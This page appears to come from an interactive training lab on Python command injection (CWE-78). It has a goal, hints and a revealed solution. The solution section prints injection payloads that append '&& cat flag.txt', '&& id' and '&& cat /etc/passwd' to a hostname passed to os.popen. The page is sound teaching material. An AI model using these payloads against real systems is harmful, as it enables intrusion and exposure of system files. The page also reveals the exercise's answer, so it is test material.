Python3

Command injection in Python -CWE-78

by Brumens

drag_indicator

info

drag_indicator

inputs

drag_indicator

inspect

Command injection in Python - CWE-78

Goal

Escape the system command nslookup in the function os.popen(...) and inject your own system command and open the file in the current folder named flag.txt!

Hints

Hint #1

expand_more

If a string starts with an f as : f"some text {somevariable}". Python replaces {somevariable} with the value of the variable somevariable.

Hint #2

expand_more

Make sure that the hostname is valid before you infect your own system command

Hint #3

expand_more

Using double && works as an "and" statement in Linux

Solution

Read the solution

expand_more

Solution to get the flag.txt file:

www.example.com && cat flag.txt

Other payloads to preform system commands

www.example.com && id

www.example.com && cat /etc/passwd

drag_indicator

waf

INPUT

OUTPUT

drag_indicator

code

drag_indicator

result